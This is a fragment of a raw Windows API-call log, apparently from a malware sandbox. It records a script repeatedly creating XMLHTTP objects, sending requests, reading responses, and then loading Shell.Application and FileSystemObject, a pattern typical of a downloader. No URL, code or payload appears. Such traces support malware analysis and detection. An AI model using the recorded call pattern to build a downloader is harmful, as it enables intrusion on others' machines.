	[0274.420] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0274.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0274.420] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0274.420] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0274.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0274.420] ??2@YAPEAX_K@Z () returned 0x62f310
	[0274.420] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0274.420] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0274.420] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0274.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0274.420] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0274.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0274.421] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0274.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0274.421] longjmp () 
	[0274.421] longjmp () 
	[0274.421] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0274.421] SysStringLen (param_1=0x0) returned 0x0
	[0274.421] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0274.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0274.421] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c20) returned 0x0
	[0274.421] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0274.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0274.421] ??2@YAPEAX_K@Z () returned 0x62f330
	[0274.421] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f330) 
	[0274.422] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0274.422] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0274.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c20) returned 0x0
	[0274.422] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c20) returned 0x3
	[0274.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0274.422] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c20, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0274.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0274.422] longjmp () 
	[0274.422] longjmp () 
	[0274.422] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0274.422] SysStringLen (param_1=0x0) returned 0x0
	[0274.422] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0274.423] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0274.423] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7480) returned 0x0
	[0274.423] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0274.423] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74e8) returned 0x0
	[0274.423] ??2@YAPEAX_K@Z () returned 0x62f310
	[0274.423] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74e8, pUnkSite=0x62f310) 
	[0274.423] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0274.423] XMLHTTPRequest:IUnknown:Release (This=0x49c74e8) returned 0x0
	[0274.423] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7480) returned 0x0
	[0274.423] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7480) returned 0x3
	[0274.423] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0274.423] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0274.423] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0274.423] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0274.423] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0274.424] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0274.640] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0274.640] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0274.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0274.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0274.641] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0274.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0274.641] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0274.641] SysStringLen (param_1=0x0) returned 0x0
	[0274.641] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0274.641] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0274.642] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0274.642] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0274.642] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0274.642] ??2@YAPEAX_K@Z () returned 0x62f350
	[0274.642] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0274.642] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0274.642] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0274.642] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0274.642] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0274.642] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0274.642] SysStringLen (param_1=0x0) returned 0x0
	[0274.642] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0274.645] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0274.645] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0274.645] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0274.645] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0274.645] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0274.645] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0275.135] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0275.135] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0275.135] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0275.136] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0275.136] SysStringLen (param_1=0x0) returned 0x0
	[0275.136] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0275.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0275.137] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7480) returned 0x0
	[0275.137] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0275.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0275.137] ??2@YAPEAX_K@Z () returned 0x62f310
	[0275.137] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0275.137] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0275.137] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0275.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7480) returned 0x0
	[0275.137] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7480) returned 0x3
	[0275.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0275.137] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0275.140] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0275.140] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0275.141] SysStringLen (param_1=0x0) returned 0x0
